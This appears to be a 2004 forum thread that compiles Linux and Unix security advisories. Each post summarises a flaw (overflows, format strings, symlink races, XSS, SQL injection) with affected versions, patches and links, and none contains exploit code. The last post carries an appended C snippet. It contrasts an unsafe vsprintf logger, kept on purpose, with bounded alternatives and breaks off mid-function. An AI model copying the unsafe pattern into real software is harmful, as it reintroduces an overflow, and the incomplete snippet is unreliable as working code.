# All Linux Vulnerabilities



## eddie5659

Hiya

Going to Sticky this for the month, well, what's left of it. The May one will take its place.

*CiscoWorks WLSE and Cisco HSE default password and username*

CiscoWorks Wireless LAN Solution Engine (WLSE) manages the Cisco Wireless LAN infrastructure and the Cisco Hosting Solution Engine (HSE) monitors and starts various e-business services in Cisco data centers. WLSE versions 2.0, 2.0.2, and 2.5 and HSE versions 1.7, 1.7.1, 1.7.2, and 1.7.3 are shipped with a default username and password. A remote attacker with knowledge of these credentials could exploit this vulnerability by connecting to an affected device to gain unauthorized access.

Platforms Affected:

Cisco Systems, Inc.: Cisco HSE 1.7 
Cisco Systems, Inc.: Cisco HSE 1.7.1 
Cisco Systems, Inc.: Cisco HSE 1.7.2 
Cisco Systems, Inc.: Cisco HSE 1.7.3 
Cisco Systems, Inc.: CiscoWorks WLSE 2.0 
Cisco Systems, Inc.: CiscoWorks WLSE 2.0.2 
Cisco Systems, Inc.: CiscoWorks WLSE 2.5

Remedy:

For WLSE:
Install the WLSE-2.x-CSCsa11583-K9.zip patch, as listed in Cisco Security Advisory 50400. See References.

For HSE:
Install the HSE-1.7.x-CSCsa11584.zip patch, as listed in Cisco Security Advisory 50400. See References.

Consequences:

Gain Access

http://xforce.iss.net/xforce/xfdb/15773


----------



## eddie5659

Hiya

Logcheck is a freely available utility program for Unix and Linux-based operating systems. Logcheck could allow a local attacker to launch a symlink attack. Logcheck creates an insecure temporary directory. If this directory is removed, a local attacker could create a symbolic link from a temporary file to any file on the system, which could allow the attacker to overwrite arbitrary files on the system.

*Platforms Affected:*

Debian Project: Debian Linux 3.0
Rami Dass: Logcheck Any version

http://xforce.iss.net/xforce/xfdb/15888

Regards

eddie


----------



## eddie5659

Hiya

SquirrelMail is a Web mail system written in PHP4. SquirrelMail is vulnerable to a buffer overflow, caused by a vulnerability in the chpasswd binary. A local attacker can exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with root privileges.

*Platforms Affected:*

kernel.org: Linux Any version
SquirrelMail Project Team: SquirrelMail Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/15889

Regards

eddie


----------



## eddie5659

Utempter is a freely available utility that allows users to give non-privileged programs root access for Linux-based operating systems. Utempter could allow a local attacker to launch a symlink attack. A local attacker could exploit this vulnerability to overwrite arbitrary files on the system.

*Platforms Affected:*

MandrakeSoft, Inc.: Mandrake Linux 10.0
MandrakeSoft, Inc.: Mandrake Linux 9.1
MandrakeSoft, Inc.: Mandrake Linux 9.2
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1
MandrakeSoft, Inc.: Mandrake Multi Network Firewall 8.2
Slackware: Slackware Linux 9.1
Slackware: Slackware Linux current

http://xforce.iss.net/xforce/xfdb/15904

Regards

eddie


----------



## eddie5659

Linux Kernel versions 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 are vulnerable to an integer overflow in the ip_setsockopt function, when handling the MCAST_MSFILTER socket option. A local attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system or cause the system to crash.

*Platforms Affected:*

kernel.org: Linux kernel 2.4.22 - 2.4.25
kernel.org: Linux kernel 2.6.1 - 2.6.3
Trustix: Trustix Secure Enterprise Linux 2
Trustix: Trustix Secure Linux 2.0
Trustix: Trustix Secure Linux 2.1

http://xforce.iss.net/xforce/xfdb/15907

Regards

eddie


----------



## eddie5659

mille is a game included in the BSD games package. mille is vulnerable to a stack-based buffer overflow. A local attacker can supply a filename with a length of 112 bytes when saving a game to overflow a buffer and execute arbitrary code on the system, with set group id (setgid) 'games' group privileges.

*Platforms Affected:*

kernel.org: Linux Any version
Red Hat: mille Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/15915

Regards

eddie


----------



## eddie5659

ArX is a revision control system for Linux-based operating systems. ArX versions prior to 1.0.19 could allow a remote attacker to execute arbitrary commands on a vulnerable client, caused by a format string vulnerability in libneon. A remote attacker, in control of a malicious WebDAV server, could supply a specially-crafted format string to execute arbitrary commands on the victim's computer, once the vulnerable client connects to the malicious server.

*Platforms Affected:*

ArX GNU Project: ArX prior to 1.0.19
kernel.org: Linux Any version

http://xforce.iss.net/xforce/xfdb/15918

Regards

eddie


----------



## eddie5659

Cherokee Web Server is a Web server for Linux and Unix-based operating systems. Cherokee Web Server versions 0.4.16 and earlier could allow a local attacker to execute arbitrary code on the system, caused by a format string vulnerability in the PRINT_ERROR function. A local attacker could exploit this vulnerability by supplying a malicious format string to the PRINT_ERROR function, which could allow the attacker to execute arbitrary commands on the system.

*Platforms Affected:*

Alo: Cherokee Web Server 0.4.16 and earlier
kernel.org: Linux Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/15924

Regards

eddie


----------



## eddie5659

ident2 is a freely available secure server that is an implementation of the ident protocol (RFC1413) for BSD and Linux-based operating systems. ident2 is vulnerable to a buffer overflow in the child_service function, caused by improper bounds checking of user-supplied input. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with privileges of the ident2 user.

*Platforms Affected:*

Debian Project: Debian Linux 3.0
Michael Bacarella: ident2 Any version

http://xforce.iss.net/xforce/xfdb/15938

Regards

eddie


----------



## eddie5659

eXtremail is a free pop3/smtp mail server for Unix. eXtremail version 1.5.9 is vulnerable to a format string attack, caused by improper filtering of user-supplied input by the logging functions. A remote attacker could supply specially-crafted format strings to commands, such as SMTP, POP and IMAP, to cause a denial of service and gain root privileges on the system.

*Platforms Affected:*

eXtremail: eXtremail 1.5.9
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/15977

Regards

eddie


----------



## eddie5659

racoon, which is included in the ipsec-tools and iputils packages in
Portage, does not check the length of ISAKMP headers. Attackers may be
able to craft an ISAKMP header of sufficient length to consume all
available system resources, causing a Denial of Service.

*Affected packages*

| Package | Vulnerable | Unaffected |
|---|---|---|
| net-firewall/ipsec-tools | < 0.3.1 | >= 0.3.1 |
| net-misc/iputils | == 021109-r1 | == 021109-r3 |

http://www.linuxsecurity.com/advisories/gentoo_advisory-4279.html

Regards

eddie


----------



## eddie5659

Several serious problems have been discovered in the Linux kernel.
This update takes care of Linux 2.4.16 for the ARM architecture. The
Common Vulnerabilities and Exposures project identifies the following
problems that will be fixed with this update:

*Affected packages*

kernel-source-2.4.16
kernel-patch-2.4.16-arm
kernel-image-2.4.16-lart
kernel-image-2.4.16-netwinder
kernel-image-2.4.16-riscpc

http://www.linuxsecurity.com/advisories/debian_advisory-4280.html

Regards

eddie


----------



## eddie5659

A vulnerability has been found in the Linux kernel in the ip_setsockopt() 
function code. There is an exploitable integer overflow inside the code 
handling the MCAST_MSFILTER socket option in the IP_MSFILTER_SIZE macro 
calculation. This issue is present in both 2.4 (2.4.25) and 2.6 kernels.

There is a minor issue with the static buffer in the 2.4 kernel's panic()
function. Although it is possibly a buffer overflow, it is most likely not
exploitable due to the nature of panic().

*Affected versions*

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

http://www.linuxsecurity.com/advisories/mandrake_advisory-4281.html

Regards

eddie


----------



## eddie5659

There are multiple format string vulnerabilities in the SSMTP package,
which may allow an attacker to run arbitrary code with ssmtp's
privileges (potentially root).

*Affected packages*

net-mail/ssmtp <= 2.60.4-r2

http://www.linuxsecurity.com/advisories/gentoo_advisory-4282.html

Regards

eddie


----------



## eddie5659

Multiple remote vulnerabilities have been found in the LCDd server,
allowing execution of arbitrary code with the rights of the LCDd user.

*Affected packages*

app-misc/lcdproc <= 0.4.4-r1

http://www.linuxsecurity.com/advisories/gentoo_advisory-4283.html

Regards

eddie


----------



## eddie5659

Several vulnerabilities have been found in xine-ui and xine-lib,
potentially allowing an attacker to overwrite files with the rights of
the user.

*Affected packages*

media-video/xine-ui <= 0.9.23-r1
media-libs/xine-lib <= 1_rc3-r2

affected packages on all of their supported architectures

http://www.linuxsecurity.com/advisories/gentoo_advisory-4284.html

Regards

eddie


----------



## eddie5659

EnGarde Secure Linux is an enterprise class Linux platform engineered
to enable corporations to quickly and cost-effectively build a complete
and secure Internet presence while preventing Internet threats.

This update includes Serial ATA (SATA) support, updated netfilter GRE
and PPTP conntrack/NAT helpers, and a new 'forcedeth' Ethernet driver
for nForce2 Ethernet support.

*Affected Software*

EnGarde Secure Community 2
EnGarde Secure Professional v1.5

http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html

Regards

eddie


----------



## eddie5659

Hiya

This thread will be updated monthly with all the previous months. A current month will be stickied at the top.

eddie


----------



## eddie5659

Midnight Commander (mc) is a file management tool for Unix. Midnight Commander version 4.x is vulnerable to a format string attack.

*Platforms Affected:*

Debian Project: Debian Linux 3.0
GNOME Project: Midnight Commander 4.x
kernel.org: Linux Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16021

Regards

eddie


----------



## eddie5659

rsync is an open-source file synchronization and transfer utility for Linux available under the GNU General Public License (GPL). rsync versions prior to 2.6.1 could allow a remote attacker to write files outside of the directory. When running non-read-only rsync without enabling chroot, a remote attacker can send a path to the rsync daemon to write files to directories outside a module's path.

*Platforms Affected:*

GNU Project: rsync prior to 2.6.1
kernel.org: Linux Any version

http://xforce.iss.net/xforce/xfdb/16014

Regards

eddie


----------



## eddie5659

LHA is a compression and archival utility for LHarc format archives for Linux and Unix-based operating systems. LHA could allow a remote attacker to traverse directories on the system. A remote attacker could send a specially-crafted filename or directory name to LHA to traverse directories and view arbitrary files on the system.

*Platforms Affected:*

kernel.org: Linux Any version
Red Hat, Inc.: Red Hat Linux 9
Tsugio Okamoto: LHA Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16013

Regards

eddie


----------



## eddie5659

LHA is a compression and archival utility for LHarc format archives for Linux and Unix-based operating systems. LHA is vulnerable to two buffer overflows, caused by improper bounds checking. A remote attacker could create a specially-crafted LHA archive to overflow the buffers and execute arbitrary code on the victim's system, once the victim tests or extracts the archive.

*Platforms Affected:*

kernel.org: Linux Any version
Red Hat, Inc.: Red Hat Linux 9
Tsugio Okamoto: LHA Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16012

Regards

eddie


----------



## eddie5659

Exim, developed by the University of Cambridge, is an open-source Mail Transfer Agent for various Unix platforms. Exim versions 3.35 and 4.32 are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. If the verify = header_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable system.

*Platforms Affected:*

Cambridge University: Exim 3.35
Cambridge University: Exim 4.32
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16079

Regards

eddie


----------



## eddie5659

Exim, developed by the University of Cambridge, is an open-source Mail Transfer Agent for various Unix platforms. Exim versions 3.35 and 4.32 are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. If the headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a remote attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable system.

*Platforms Affected:*

Cambridge University: Exim 3.35
Cambridge University: Exim 4.32
Debian Project: Debian Linux 3.0
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16077

Regards

eddie


----------



## eddie5659

Icecast is an open-source mp3 broadcasting program for Microsoft Windows and Unix-based operating systems. Icecast version 2.0.0 is vulnerable to a heap-based buffer overflow. By sending a specially-crafted base64 authorization request, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system or cause the system to crash.

*Platforms Affected:*

Icecast: Icecast 2.0.0
kernel.org: Linux Any version
Microsoft Corporation: Windows Any version

http://xforce.iss.net/xforce/xfdb/16103

Regards

eddie


----------



## eddie5659

Two stack-based buffer overflows and two directory traversal problems
have been found in LHa. These vulnerabilities can be used to execute
arbitrary code or as a denial of service attack.

*Affected packages*

app-arch/lha <= 114i-r1

http://www.linuxsecurity.com/advisories/gentoo_advisory-4313.html

Regards

eddie


----------



## eddie5659

There are multiple format string vulnerabilities in libneon which may
allow a malicious WebDAV server to execute arbitrary code.

*Affected packages*

net-misc/neon <= 0.24.4

http://www.linuxsecurity.com/advisories/gentoo_advisory-4314.html

Regards

eddie


----------



## eddie5659

Some versions of Heimdal do not perform appropriate checking of the
`transited' field.

*Affects*

FreeBSD 4 with Kerberos 5 installed, and FreeBSD 5

http://www.linuxsecurity.com/advisories/freebsd_advisory-4315.html

Regards

eddie


----------



## eddie5659

An input validation error was discovered in the k5admind code that
handles the framing of Kerberos 4 compatibility administration
requests. The code assumed that the length given in the framing was
always two or more bytes. Smaller lengths will cause k5admind to read
an arbitrary amount of data into a minimally-sized buffer on the heap.

Note that this code is not present unless k5admind has been compiled
with Kerberos 4 support. This will occur if a FreeBSD system is
compiled with both of the WITH_KERBEROS4 and WITH_KERBEROS5 build flags.
These flags are never simultaneously set during the FreeBSD binary
release process; consequently, binary installs of FreeBSD (even with
Kerberos support installed) are not affected.

*Affects*

FreeBSD 4 systems built with both Kerberos 4 and Kerberos 5.
FreeBSD 5 systems prior to 5.1 built with both Kerberos 4 and
Kerberos 5.

http://www.linuxsecurity.com/advisories/freebsd_advisory-4316.html

Regards

eddie


----------



## eddie5659

Several buffer overflows, several temporary file creation
vulnerabilities, and one format string vulnerability have been
discovered in Midnight Commander.

*Affects*

Midnight Commander v 4.6.0

http://www.linuxsecurity.com/advisories/fedora_advisory-4317.html

Regards

eddie


----------



## eddie5659

Updated OpenSSL packages that fix remote denial of service vulnerabilities 
are now available.

*Relevant releases/architectures:*

Red Hat Linux 7.2 - i386 i686
Red Hat Linux 7.3 - i386 i686
Red Hat Linux 8.0 - i386 i686

http://www.linuxsecurity.com/advisories/fedora_advisory-4318.html

Regards

eddie


----------



## eddie5659

A vulnerability was discovered in rsync, a file transfer program,
whereby a remote user could cause an rsync daemon to write files
outside of the intended directory tree. This vulnerability is not
exploitable when the daemon is configured with the 'chroot' option.

For the current stable distribution (woody) this problem has been
fixed in version 2.5.5-0.4.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.1-1.

http://www.linuxsecurity.com/advisories/debian_advisory-4319.html

Regards

eddie


----------



## eddie5659

Tatsuya Kinoshita discovered a vulnerability in flim, an emacs library
for working with internet messages, where temporary files were created
without taking appropriate precautions. This vulnerability could
potentially be exploited by a local user to overwrite files with the
privileges of the user running emacs.

For the current stable distribution (woody) this problem has been
fixed in version 1.14.3-9woody1.

For the unstable distribution (sid), this problem will be fixed soon.

http://www.linuxsecurity.com/advisories/debian_advisory-4320.html

Regards

eddie


----------



## eddie5659

Georgi Guninski discovered two stack-based buffer overflows. They can
not be exploited with the default configuration from the Debian
system, though. The Common Vulnerabilities and Exposures project
identifies the following problems that are fixed with this update.

For the stable distribution (woody) these problems have been fixed in
version 3.35-1woody3.

For the unstable distribution (sid) these problems have been fixed in
version 3.36-11 for exim 3 and in version 4.33-1 for exim 4.

http://www.linuxsecurity.com/advisories/debian_advisory-4321.html

Regards

eddie


----------



## eddie5659

Apache 2 before 2.0.47, and certain versions
of mod_ssl for Apache 1.3, do not properly handle "certain
sequences of per-directory re-negotiations and the
SSLCipherSuite directive being used to upgrade from a weak
cipher suite to a strong one," which could cause Apache
to use the weak cipher suite.

Multiple stack-based buffer overflows in 
mod_alias and mod_rewrite for Apache before 1.3.29 may allow 
attackers to create configuration files to cause a denial of 
service or execute arbitrary code via a regular expression
with more than 9 captures.

*Vulnerable Supported Versions*

UnixWare 7.1.3 Apache distribution
Open UNIX 8.0.0 Apache distribution
UnixWare 7.1.1 Apache distribution

http://www.linuxsecurity.com/advisories/caldera_advisory-4323.html

Regards

eddie


----------



## eddie5659

cPanel is a Web-based management interface for Linux-based operating systems. cPanel version 9.3.0-R5 and possibly earlier versions could allow a remote authenticated attacker to obtain sensitive information, including usernames and passwords. The Fantastico addon creates database names based on usernames, and users have read access to the /var/lib/mysql directory, which contains the database names. A remote authenticated attacker could exploit this vulnerability by using brute-force techniques to obtain users' passwords to gain access to other users' accounts.

*Platforms Affected:*

cPanel Inc.: cPanel 9.3.0-R5
kernel.org: Linux Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16197

Regards

eddie


----------



## eddie5659

CVS (Concurrent Versions System) is an open-source source code management and distribution system available for most Linux and Unix-based operating systems. CVS feature versions 1.12.7 and earlier and stable versions 1.11.15 and earlier are vulnerable to a heap overflow, caused by improper handling of entry lines when applying modified and unchanged flags. A remote attacker could send specially-crafted commands to overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:*

CVS, Derek Price: CVS (Concurrent Versions System) 1.11.15 and earlier
CVS, Derek Price: CVS (Concurrent Versions System) 1.12.7 and earlier
Debian Project: Debian Linux 3.0
FreeBSD Project: FreeBSD Any version
kernel.org: Linux Any version
Red Hat, Inc.: Red Hat Advanced Workstation 2.1
Red Hat, Inc.: Red Hat Enterprise Linux 2.1AS
Red Hat, Inc.: Red Hat Enterprise Linux 2.1ES
Red Hat, Inc.: Red Hat Enterprise Linux 2.1WS
Red Hat, Inc.: Red Hat Enterprise Linux 3AS
Red Hat, Inc.: Red Hat Enterprise Linux 3ES
Red Hat, Inc.: Red Hat Enterprise Linux 3WS
Red Hat, Inc.: Red Hat Linux Desktop 3
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16193

Regards

eddie


----------



## eddie5659

Subversion is a version control project for all Linux and Unix-based operating systems. Subversion versions 1.0.2 and prior could allow a remote attacker to execute arbitrary code on the system, caused by a vulnerability when parsing the date string. A remote attacker could send a specially-crafted DAV2 REPORT query or get-dated-rev svn-protocol command to cause a stack-based buffer overflow. A remote attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the victim.

*Platforms Affected:*

kernel.org: Linux Any version
Tigris.org: Subversion 1.0.2 and prior
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16191

Regards

eddie


----------



## eddie5659

neon is a freely available HTTP and WebDAV library for Unix and Linux-based operating systems. neon versions 0.24.5 and earlier are vulnerable to a heap-based buffer overflow in the date parsing function of the neon library. A remote attacker can supply a specially-crafted date string to the ne_rfc1036_parse function to overflow a buffer and possibly execute arbitrary code on the system, depending on how the application uses the neon library.

*Platforms Affected:*

Debian Project: Debian Linux 3.0
Joe Orton: neon 0.24.5 and earlier
kernel.org: Linux Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16192

Regards

eddie


----------



## EdwardBrown

Maybe it's just me, but I don't understand. Where is the "Microsoft Vulnerabilities" thread?


----------



## eddie5659

Hiya

It's here:

http://forums.techguy.org/t195532.html

And the older ones are here:

http://forums.techguy.org/t220750.html

Regards

eddie


----------



## EdwardBrown

Thank you, eddie. Why is that thread closed, though? It's as if somebody is trying to keep Linux users more informed than Microsoft users. Why are Linux users getting special treatment?


----------



## eddie5659

I keep that one closed, as some people tend to tag on and ask the questions that should be in their respective threads. I suppose I should close the one in Linux, but as I'm revising this month, I'll update it once again, and keep it closed.

Some of the smaller vulnerabilities, like Norton etc., I place in their forums such as Software. These aren't locked, as many have updates about that particular problem themselves.

eddie


----------



## eddie5659

log2mail is a log file analyzer, developed by Michael Krax, for Linux-based operating systems. log2mail versions prior to 0.2.5.2 for Debian Linux 3.0 and possibly other Linux distributions could allow a local attacker to execute arbitrary code on the system, caused by a format string vulnerability. A local attacker could log a specially-crafted message using the syslog function to execute arbitrary code on the system with privileges of the log2mail process.

*Platforms Affected:*

Debian Project: Debian Linux 3.0
Michael Krax: log2mail prior to 0.2.5.2

http://xforce.iss.net/xforce/xfdb/16311

Regards

eddie


----------



## eddie5659

Slackware Linux versions 8.1, 9.0, and 9.1 could allow a local attacker to gain elevated privileges on the system, caused by a vulnerability in the PHP package. A local attacker could place a malicious shared library in the /tmp directory to execute arbitrary code on the system or cause PHP to crash.

*Platforms Affected:*

Slackware: Slackware Linux 8.1
Slackware: Slackware Linux 9.0
Slackware: Slackware Linux 9.1

http://xforce.iss.net/xforce/xfdb/16310

Regards

eddie


----------



## eddie5659

l2tpd is a layer 2 tunneling protocol daemon for Linux. l2tpd version 0.64 is vulnerable to a buffer overflow in the write_packet function in the control.c file, caused by improper bounds checking of user-supplied input. By sending a specially-crafted packet, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system.

*Platforms Affected:*

kernel.org: Linux Any version
l2tpd Project: l2tpd 0.64

http://xforce.iss.net/xforce/xfdb/16326

Regards

eddie


----------



## eddie5659

cPanel is a Web-based management interface for Linux-based operating systems. cPanel could allow a remote authenticated administrator to delete customer information from accounts that are not the administrator's. A remote authenticated administrator could use a specially-crafted cookie and the /scripts/killacct script to delete DNS information.

*Platforms Affected:*

cPanel Inc.: cPanel any version
kernel.org: Linux Any version
Various: Unix Any version

http://xforce.iss.net/xforce/xfdb/16325

Regards

eddie


----------



## eddie5659

Crafty Syntax Live Help (CSLH) is an open source PHP-based live help support chat program for Linux platforms. CSLH versions prior to 2.7.4 are vulnerable to cross-site scripting, caused by improper filtering of user-supplied input. A remote attacker could embed malicious script within the name field of a livehelp or a chat session, which would be executed in the victim's Web browser within the security context of the hosting site, once the session is processed. An attacker could use this vulnerability to steal a victim's cookie-based authentication credentials, obtain other sensitive information or launch further attacks against the affected system.

*Platforms Affected:*

kernel.org: Linux Any version
Open Source: Crafty Syntax Live Help (CSLH) prior to 2.7.4

http://xforce.iss.net/xforce/xfdb/16321

Regards

eddie


----------



## eddie5659

Multiple buffer overflows exist in the krb5_aname_to_localname()
library function that if exploited could lead to unauthorized root
privileges. In order to exploit this flaw, an attacker must first
successfully authenticate to a vulnerable service, which must be
configured to enable the explicit mapping or rules-based mapping
functionality of krb5_aname_to_localname, which is not a default
configuration.

*Affected versions:*

10.0, 9.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

http://www.linuxsecurity.com/advisories/mandrake_advisory-4452.html

Regards

eddie


----------



## eddie5659

Mdkonline as shipped in 10.0 has some issues comparing squid release
versions. This package is a mandatory upgrade to get fully functional
Mandrake Online services.

*Updated Packages:*

Mandrakelinux 10.0:
42a4bfe7e7558738b1e0e7530434966c 10.0/RPMS/mdkonline-1.1-2.1.100mdk.noarch.rpm
ddf9aa3ee5ac54824ed4a197629866e7 10.0/SRPMS/mdkonline-1.1-2.1.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
f42516ed24e578633f629571be7f757e amd64/10.0/RPMS/mdkonline-1.1-2.1.100mdk.noarch.rpm
ddf9aa3ee5ac54824ed4a197629866e7 amd64/10.0/SRPMS/mdkonline-1.1-2.1.100mdk.src.rpm

http://www.linuxsecurity.com/advisories/mandrake_advisory-4453.html

Regards

eddie


----------



## eddie5659

A vulnerability exists in squid's NTLM authentication helper. This
buffer overflow can be exploited by a remote attacker by sending an
overly long password, thus overflowing the buffer and granting the
ability to execute arbitrary code. This can only be exploited,
however, if NTLM authentication is used. NTLM authentication is built
by default in Mandrakelinux packages, but is not enabled in the
default configuration.

The vulnerability exists in 2.5.\*-STABLE and 3.\*-PRE. The provided
packages are patched to fix this problem.

http://www.linuxsecurity.com/advisories/mandrake_advisory-4455.html

Regards

eddie


----------



## eddie5659

Geoffrey Lee discovered a problem with the ksymoops-gznm script
distributed with Mandrakelinux. The script fails to do proper checking
when copying a file to the /tmp directory. Because of this, a local
attacker can set up a symlink to point to a file that they do not have
permission to remove. The problem is difficult to exploit because
someone with root privileges needs to run ksymoops on a particular
module for which a symlink for the same filename already exists.

*Affected versions:* 10.0, 9.1, 9.2, Corporate Server 2.1

http://www.linuxsecurity.com/advisories/mandrake_advisory-4456.html

Regards

eddie


----------



## eddie5659

Mailman contains a bug allowing 3rd parties to retrieve member
passwords.

*Affected packages*

| Package | Vulnerable | Unaffected |
|---|---|---|
| net-mail/mailman | < 2.1.5 | >= 2.1.5 |

http://www.linuxsecurity.com/advisories/gentoo_advisory-4457.html

Regards

eddie


----------



## eddie5659

A bug in mod_ssl may allow a remote attacker to execute remote code
when Apache is configured a certain way.

*Affected packages*

| # | Package | Vulnerable | Unaffected |
|---|---|---|---|
| 1 | net-www/mod_ssl | < 2.8.18 | >= 2.8.18 |
| 2 | net-www/apache | <= 2.0.49-r2 | < 2.0, >= 2.0.49-r3 |

2 affected packages on all of their supported architectures.

http://www.linuxsecurity.com/advisories/gentoo_advisory-4458.html

Regards

eddie


----------



## eddie5659

Several serious new vulnerabilities have been found in CVS, which may
allow an attacker to remotely compromise a CVS server.

*Affected packages*

| Package | Vulnerable | Unaffected |
|---|---|---|
| dev-util/cvs | <= 1.11.16-r1 | >= 1.11.17 |

http://www.linuxsecurity.com/advisories/gentoo_advisory-4459.html

Regards

eddie


----------



## eddie5659

An SQL injection flaw was found in SquirrelMail version 1.4.2 and
earlier. If SquirrelMail is configured to store user addressbooks in
the database, a remote attacker could use this flaw to execute
arbitrary SQL statements. The Common Vulnerabilities and Exposures
project has assigned the name CAN-2004-0521 to this issue.

A number of cross-site scripting (XSS) flaws in SquirrelMail version
1.4.2 and earlier could allow remote attackers to execute scripts as
other web users. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the names CAN-2004-0519 and CAN-2004-0520
to these issues.

http://www.linuxsecurity.com/advisories/fedora_advisory-4460.html

Regards

eddie


----------



## eddie5659

libpng: Jaakko Heinonen reported an old minor security issue that was
not fixed correctly.

mod_php4: New upstream version that fixes several minor issues.

openssl: Added a couple of missing files in the python library.

rsync: Fixed a packaging issue in the rsync package of TSL 1.5

stunnel: Jaakko Heinonen reported another old minor security issue
that was not fixed correctly.

swup: fixed a problem with multiple providers of same resource.
(patch by Omar Kilani)

*Affected versions

Trustix Secure Linux 1.5
Trustix Secure Linux 2.0
Trustix Secure Linux 2.1
Trustix Operating System - Enterprise Server 2

*

http://www.linuxsecurity.com/advisories/trustix_advisory-4511.html

Regards

eddie


----------



## eddie5659

The Dynamic Host Configuration Protocol (DHCP) server is used to
configure clients that dynamically connect to a network (WLAN
hotspots, customer networks, ...).
The CERT informed us about a buffer overflow in the logging code of the
server that can be triggered by a malicious client by supplying multiple
hostnames. The hostname strings are concatenated and copied in a
fixed size buffer without checking the buffer bounds.
Other possible buffer overflow conditions exist in using vsprintf()
instead of vsnprintf(). This behavior can be configured during compile-
time. The dhcp/dhcp-server package coming with SUSE LINUX used the
vulnerable vsprintf() function.

Since SuSE Linux 8.1/SuSE Linux Enterprise Server 8 the DHCP server runs
as non-root user in a chroot jail. This setup limits the impact of a
successful attack.

There is no temporary workaround known.

*Affected products:

8.0, 8.1, 8.2, 9.0, 9.1
SUSE Linux Database Server,
SUSE eMail Server III, 3.1
SUSE Linux Enterprise Server 7, 8
SUSE Linux Firewall on CD/Admin host
SUSE Linux Connectivity Server
SUSE Linux Office Server

*

http://www.linuxsecurity.com/advisories/suse_advisory-4512.html

Regards

eddie


----------



## eddie5659

A vulnerability in how ISC's DHCPD handles syslog messages can allow a
malicious attacker with the ability to send special packets to the
DHCPD listening port to crash the daemon, causing a Denial of Service.
It is also possible that they may be able to execute arbitrary code on
the vulnerable server with the permissions of the user running DHCPD,
which is usually root.

A similar vulnerability also exists in the way ISC's DHCPD makes use
of the vsnprintf() function on systems that do not support vsnprintf().
This vulnerability could also be used to execute arbitrary code and/or
perform a DoS attack. The vsnprintf() statements that have this
problem are defined after the vulnerable code noted above, which would
trigger the previous problem rather than this one.

*Affected versions: 10.0, 9.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4513.html

Regards

eddie
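The vsprintf()/vsnprintf() distinction that both the SUSE post above and this Mandrake post describe, as an added C example that is not ISC dhcpd, SUSE or Mandrake code: the same log helper written unbounded and bounded, plus bounded concatenation of client-supplied hostnames. The buffer size, function names and sample hostnames are constructed for illustration.

```c
/*
 * Added example (not ISC dhcpd code): why the advisories single out
 * vsprintf() versus vsnprintf() when client-supplied hostnames are
 * concatenated into a fixed-size log buffer. Names and sizes are constructed.
 */
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 64   /* deliberately small so the truncation case is easy to hit */

/*
 * The unsafe pattern from the advisory, kept only for comparison and never
 * called: vsprintf() writes whatever length the format produces, so long or
 * numerous hostnames run straight past the end of buf.
 */
void log_unbounded(char *buf, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(buf, fmt, ap);            /* no bound on the output length */
    va_end(ap);
}

/*
 * Bounded variant: vsnprintf() writes at most cap bytes including the NUL and
 * returns the length the full message would have had, so the caller can
 * detect truncation instead of silently corrupting memory.
 * Returns true when the whole message fit, false when it was truncated.
 */
bool log_bounded(char *buf, size_t cap, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, cap, fmt, ap);
    va_end(ap);
    return n >= 0 && (size_t)n < cap;
}

/*
 * Build the space-separated hostname list the advisory describes, but track
 * the remaining room and stop appending when the next name would not fit.
 * Returns the number of hostnames actually written; out is always terminated.
 */
size_t join_hostnames(char *out, size_t cap, const char *const *names, size_t count)
{
    size_t used = 0, written = 0;
    if (cap == 0) return 0;
    out[0] = '\0';
    for (size_t i = 0; i < count; i++) {
        size_t len = strlen(names[i]);
        size_t need = len + (written ? 1 : 0);   /* name plus separator */
        if (need > cap - 1 - used) break;        /* would overrun: stop */
        if (written) out[used++] = ' ';
        memcpy(out + used, names[i], len);
        used += len;
        out[used] = '\0';
        written++;
    }
    return written;
}

/* Constructed sample: a client offering more hostnames than the buffer holds. */
static const char *const SAMPLE_HOSTS[] = {
    "workstation-01", "workstation-01.example.test",
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbb",
};

/* Run the bounded path over the sample; true if the log line fit in msg. */
bool demo_dhcp_log(char *msg, size_t cap)
{
    char hosts[LOG_BUF];
    join_hostnames(hosts, sizeof hosts, SAMPLE_HOSTS,
                   sizeof SAMPLE_HOSTS / sizeof SAMPLE_HOSTS[0]);
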